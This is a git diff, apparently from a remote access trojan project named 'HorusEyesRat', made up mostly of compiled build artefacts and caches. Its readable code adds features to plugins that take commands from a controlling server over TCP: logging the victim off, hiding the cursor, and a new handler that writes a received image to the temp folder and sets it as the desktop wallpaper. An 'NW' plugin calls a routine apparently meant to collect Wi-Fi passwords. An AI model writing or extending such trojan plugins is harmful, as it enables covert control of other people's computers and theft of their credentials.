b/MO/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/MO/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..951925a Binary files /dev/null and b/MO/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed new file mode 100644 index 0000000..bda82f6 Binary files /dev/null and b/MO/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..9790ff2 Binary files /dev/null and b/MO/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/MO/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/MO/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/MO/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/MO/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/MO/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/MO/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/MO/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 0000000..2c67faa Binary files /dev/null and b/MO/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/MO/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed new file mode 100644 index 0000000..643f842 Binary files /dev/null and b/MO/obj/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..02c151f Binary files /dev/null and b/MO/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed b/MO/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed new file mode 100644 index 0000000..c389ee1 Binary files /dev/null and b/MO/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed differ diff --git a/MO/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/MO/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/MO/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/MO/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/MO/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..585a280 Binary files /dev/null and b/MO/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/MO/obj/Release/MO.dll b/MO/obj/Release/MO.dll new file mode 100644 index 0000000..e0fe977 Binary files /dev/null and b/MO/obj/Release/MO.dll differ diff --git a/MO/obj/Release/MO.pdb b/MO/obj/Release/MO.pdb new file mode 100644 index 0000000..1b5c319 Binary files /dev/null and b/MO/obj/Release/MO.pdb differ diff --git a/MO/obj/Release/MO.vbproj.CopyComplete b/MO/obj/Release/MO.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/MO/obj/Release/MO.vbproj.CoreCompileInputs.cache b/MO/obj/Release/MO.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..95ff25e --- /dev/null +++ b/MO/obj/Release/MO.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +f7d41961512c340305c38fae45d3d1195cb770a3 diff --git a/MO/obj/Release/MO.vbproj.FileListAbsolute.txt b/MO/obj/Release/MO.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..bc2beac --- /dev/null +++ b/MO/obj/Release/MO.vbproj.FileListAbsolute.txt @@ -0,0 +1,12 @@ +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MO.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MO.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MO.xml +Z:\HorusEyesRat-master\MO\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\MO\obj\Release\MO.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\MO\obj\Release\MO.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\MO\obj\Release\MO.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\MO\obj\Release\MO.vbproj.CopyComplete +Z:\HorusEyesRat-master\MO\obj\Release\MO.dll +Z:\HorusEyesRat-master\MO\obj\Release\MO.xml +Z:\HorusEyesRat-master\MO\obj\Release\MO.pdb +Z:\HorusEyesRat-master\MO\obj\Release\MO.vbprojAssemblyReference.cache diff --git a/MO/obj/Release/MO.vbproj.Fody.CopyLocal.cache b/MO/obj/Release/MO.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..90e716b --- /dev/null +++ b/MO/obj/Release/MO.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/MO/obj/Release/MO.vbproj.GenerateResource.cache b/MO/obj/Release/MO.vbproj.GenerateResource.cache new file mode 100644 index 0000000..e2584b3 Binary files /dev/null and b/MO/obj/Release/MO.vbproj.GenerateResource.cache differ diff --git a/MO/obj/Release/MO.vbprojAssemblyReference.cache b/MO/obj/Release/MO.vbprojAssemblyReference.cache new file mode 100644 index 0000000..1b7f800 Binary files /dev/null and b/MO/obj/Release/MO.vbprojAssemblyReference.cache differ diff --git a/MO/obj/Release/MO.xml b/MO/obj/Release/MO.xml new file mode 100644 index 0000000..330d3c6 --- /dev/null +++ b/MO/obj/Release/MO.xml @@ -0,0 +1,26 @@ + + + + +MO + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/MO/obj/Release/PL.Resources.resources b/MO/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/MO/obj/Release/PL.Resources.resources differ diff --git a/MO/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/MO/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..3b0b49d Binary files /dev/null and b/MO/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/MO/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/MO/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..30510f3 Binary files /dev/null and b/MO/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/MO/packages.config b/MO/packages.config new file mode 100644 index 0000000..4a26327 --- /dev/null +++ b/MO/packages.config @@ -0,0 +1,5 @@ + + + + + \ No newline at end of file diff --git a/MS/MS.vbproj b/MS/MS.vbproj index 73294c9..cea9b31 100644 --- a/MS/MS.vbproj +++ b/MS/MS.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ MS.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -50,8 +50,9 @@ ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll - - ..\PacketLib\bin\Debug\PacketLib.dll + + False + ..\PacketLib\bin\Release\PacketLib.dll diff --git a/MS/Main.vb b/MS/Main.vb index f385722..f4cd44a 100644 --- a/MS/Main.vb +++ b/MS/Main.vb @@ -3,9 +3,11 @@ Imports PacketLib Imports PacketLib.Packet Public Class Main Public Shared Async Sub Main(ByVal K As TcpClient, ByVal Param_Tab As Object()) + Dim CastParam As Packet_Subject = CType(Param_Tab(0), Packet_Subject) Select Case CastParam + Case Packet_Subject.LOG_OUT Await Task.Run(Sub() NativeAPI.PowerOptions(NativeAPI.EWX_LOGOFF, 0)) @@ -63,6 +65,10 @@ Public Class Main Case Packet_Subject.CURSOR_VISIBILITY Await Task.Run(Sub() NativeAPI.CursorVisibility(Param_Tab(1))) + + Case Packet_Subject.SET_WPP + + Await Task.Run(Sub() NativeAPI.SetWallpapertoBackground(Param_Tab(1), Param_Tab(2))) End Select End Sub diff --git a/MS/NativeAPI.vb b/MS/NativeAPI.vb index 9217b01..8408b4d 100644 --- a/MS/NativeAPI.vb +++ b/MS/NativeAPI.vb @@ -58,16 +58,19 @@ Public Class NativeAPI NtUserShowSystemCursor(B) End Sub - ''Not set yet because of problem with openfiledialog server-side - Public Shared Async Sub SetWallPaper(ByVal Data As Object()) - Try - Await Task.Run(Sub() IO.File.WriteAllBytes(IO.Path.GetTempPath & "\" & Data(1), Data(2))) - NativeAPI.SetDeskWallpaper(IO.Path.GetTempPath & "\" & Data(1)) - Catch ex As Exception + Public Shared Async Sub SetWallpapertoBackground(ByVal Name As String, ByVal Img As Byte()) + + Await Task.Run(Sub() IO.File.WriteAllBytes(IO.Path.GetTempPath + "\" + Name, Img)) + + SystemParametersInfo(param1, 0, IO.Path.GetTempPath + "\" + Name, param2 Or param3) - End Try End Sub + Const param1 As Integer = 20 + Const param2 As Integer = &H1 + Const param3 As Integer = &H2 + + Private Declare Auto Function SystemParametersInfo Lib "user32.dll" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer diff --git a/MS/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/MS/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/MS/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/MS/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/MS/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/MS/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index 93cad0a..9f65af6 100644 Binary files a/MS/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/MS/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/MS/obj/Debug/MS.dll b/MS/obj/Debug/MS.dll index ae78460..9f2da55 100644 Binary files a/MS/obj/Debug/MS.dll and b/MS/obj/Debug/MS.dll differ diff --git a/MS/obj/Debug/MS.pdb b/MS/obj/Debug/MS.pdb index ee941d4..9e5ce28 100644 Binary files a/MS/obj/Debug/MS.pdb and b/MS/obj/Debug/MS.pdb differ diff --git a/MS/obj/Debug/MS.vbproj.CoreCompileInputs.cache b/MS/obj/Debug/MS.vbproj.CoreCompileInputs.cache index b57c777..394ca23 100644 --- a/MS/obj/Debug/MS.vbproj.CoreCompileInputs.cache +++ b/MS/obj/Debug/MS.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -5850779bef2ed92d71b5addf16183721647a76e9 +27391698ae89be7321a7f3708aa776d6dfc6cb05 diff --git a/MS/obj/Debug/MS.vbproj.FileListAbsolute.txt b/MS/obj/Debug/MS.vbproj.FileListAbsolute.txt index c9d562f..db8d7a2 100644 --- a/MS/obj/Debug/MS.vbproj.FileListAbsolute.txt +++ b/MS/obj/Debug/MS.vbproj.FileListAbsolute.txt @@ -37,3 +37,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\MS\obj\Debug\MS.vbproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\MS\obj\Debug\MS.dll C:\Users\mehdi\Documents\HorusEyesRat-main\MS\obj\Debug\MS.xml C:\Users\mehdi\Documents\HorusEyesRat-main\MS\obj\Debug\MS.pdb +Z:\HorusEyesRat-master\MS\bin\Debug\MS.dll +Z:\HorusEyesRat-master\MS\bin\Debug\MS.pdb +Z:\HorusEyesRat-master\MS\bin\Debug\MS.xml +Z:\HorusEyesRat-master\MS\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\MS\obj\Debug\MS.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\MS\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\MS\obj\Debug\MS.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\MS\obj\Debug\MS.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\MS\obj\Debug\MS.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\MS\obj\Debug\MS.vbproj.CopyComplete +Z:\HorusEyesRat-master\MS\obj\Debug\MS.dll +Z:\HorusEyesRat-master\MS\obj\Debug\MS.xml +Z:\HorusEyesRat-master\MS\obj\Debug\MS.pdb diff --git a/MS/obj/Debug/MS.vbproj.Fody.CopyLocal.cache b/MS/obj/Debug/MS.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/MS/obj/Debug/MS.vbproj.Fody.CopyLocal.cache +++ b/MS/obj/Debug/MS.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/MS/obj/Debug/MS.vbproj.GenerateResource.cache b/MS/obj/Debug/MS.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/MS/obj/Debug/MS.vbproj.GenerateResource.cache and b/MS/obj/Debug/MS.vbproj.GenerateResource.cache differ diff --git a/MS/obj/Debug/MS.vbprojAssemblyReference.cache b/MS/obj/Debug/MS.vbprojAssemblyReference.cache index 96ca407..d636d4b 100644 Binary files a/MS/obj/Debug/MS.vbprojAssemblyReference.cache and b/MS/obj/Debug/MS.vbprojAssemblyReference.cache differ diff --git a/MS/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/MS/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/MS/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/MS/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/MS/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed new file mode 100644 index 0000000..bda82f6 Binary files /dev/null and b/MS/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..9790ff2 Binary files /dev/null and b/MS/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/MS/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/MS/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/MS/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/MS/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/MS/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/MS/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/MS/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/MS/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/MS/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 0000000..2c67faa Binary files /dev/null and b/MS/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed new file mode 100644 index 0000000..a4645e4 Binary files /dev/null and b/MS/obj/Release/Costura/9C887EEB0D134C85E8BFC53AF08E9D5C722CB08C.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..02c151f Binary files /dev/null and b/MS/obj/Release/Costura/CD6906005ADAAB7407932C125DB73699CAE8194A.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed b/MS/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed new file mode 100644 index 0000000..c389ee1 Binary files /dev/null and b/MS/obj/Release/Costura/EF7A14D5C89C0296F01FF7FE63E5CF1B30DB1E04.costura.packetlib.dll.compressed differ diff --git a/MS/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/MS/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/MS/obj/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/MS/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/MS/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..8f6a10f Binary files /dev/null and b/MS/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/MS/obj/Release/MS.dll b/MS/obj/Release/MS.dll new file mode 100644 index 0000000..6f13c39 Binary files /dev/null and b/MS/obj/Release/MS.dll differ diff --git a/MS/obj/Release/MS.pdb b/MS/obj/Release/MS.pdb new file mode 100644 index 0000000..8f80430 Binary files /dev/null and b/MS/obj/Release/MS.pdb differ diff --git a/MS/obj/Release/MS.vbproj.CopyComplete b/MS/obj/Release/MS.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/MS/obj/Release/MS.vbproj.CoreCompileInputs.cache b/MS/obj/Release/MS.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..4abbf35 --- /dev/null +++ b/MS/obj/Release/MS.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +1c20953816e2f4e02b611bea871e18b8eab84814 diff --git a/MS/obj/Release/MS.vbproj.FileListAbsolute.txt b/MS/obj/Release/MS.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..0f96545 --- /dev/null +++ b/MS/obj/Release/MS.vbproj.FileListAbsolute.txt @@ -0,0 +1,19 @@ +Z:\HorusEyesRat-master\MS\bin\Release\MS.dll +Z:\HorusEyesRat-master\MS\bin\Release\MS.pdb +Z:\HorusEyesRat-master\MS\bin\Release\MS.xml +Z:\HorusEyesRat-master\MS\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\MS.dll +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\MS.pdb +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\MS.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MS.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MS.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\MS.xml +Z:\HorusEyesRat-master\MS\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\MS\obj\Release\MS.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\MS\obj\Release\MS.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\MS\obj\Release\MS.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\MS\obj\Release\MS.vbproj.CopyComplete +Z:\HorusEyesRat-master\MS\obj\Release\MS.dll +Z:\HorusEyesRat-master\MS\obj\Release\MS.xml +Z:\HorusEyesRat-master\MS\obj\Release\MS.pdb +Z:\HorusEyesRat-master\MS\obj\Release\MS.vbprojAssemblyReference.cache diff --git a/MS/obj/Release/MS.vbproj.Fody.CopyLocal.cache b/MS/obj/Release/MS.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..90e716b --- /dev/null +++ b/MS/obj/Release/MS.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Release\PacketLib.xml diff --git a/MS/obj/Release/MS.vbproj.GenerateResource.cache b/MS/obj/Release/MS.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/MS/obj/Release/MS.vbproj.GenerateResource.cache differ diff --git a/MS/obj/Release/MS.vbprojAssemblyReference.cache b/MS/obj/Release/MS.vbprojAssemblyReference.cache new file mode 100644 index 0000000..a3f70dd Binary files /dev/null and b/MS/obj/Release/MS.vbprojAssemblyReference.cache differ diff --git a/MS/obj/Release/MS.xml b/MS/obj/Release/MS.xml new file mode 100644 index 0000000..48250b0 --- /dev/null +++ b/MS/obj/Release/MS.xml @@ -0,0 +1,44 @@ + + + + +MS + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + The device is part of the desktop. + + + The device is part of the desktop. + + + Represents a pseudo device used to mirror application drawing for remoting or other purposes. + + + The device is VGA compatible. + + + The device is removable; it cannot be the primary display. + + + The device has more display modes than its output devices support. + + + diff --git a/MS/obj/Release/PL.Resources.resources b/MS/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/MS/obj/Release/PL.Resources.resources differ diff --git a/MS/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/MS/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..bb069fc Binary files /dev/null and b/MS/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/MS/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/MS/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..a03a4a2 Binary files /dev/null and b/MS/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/NW/Main.vb b/NW/Main.vb index 508f91e..614a0a5 100644 --- a/NW/Main.vb +++ b/NW/Main.vb @@ -3,7 +3,7 @@ Imports PacketLib Imports PacketLib.Packet Imports System.Windows.Forms Public Class Main - + '' Public Shared Sub Main(ByVal K As TcpClient, ByVal Param_Tab As Object()) GetW_PW(K) End Sub diff --git a/NW/NW.vbproj b/NW/NW.vbproj index 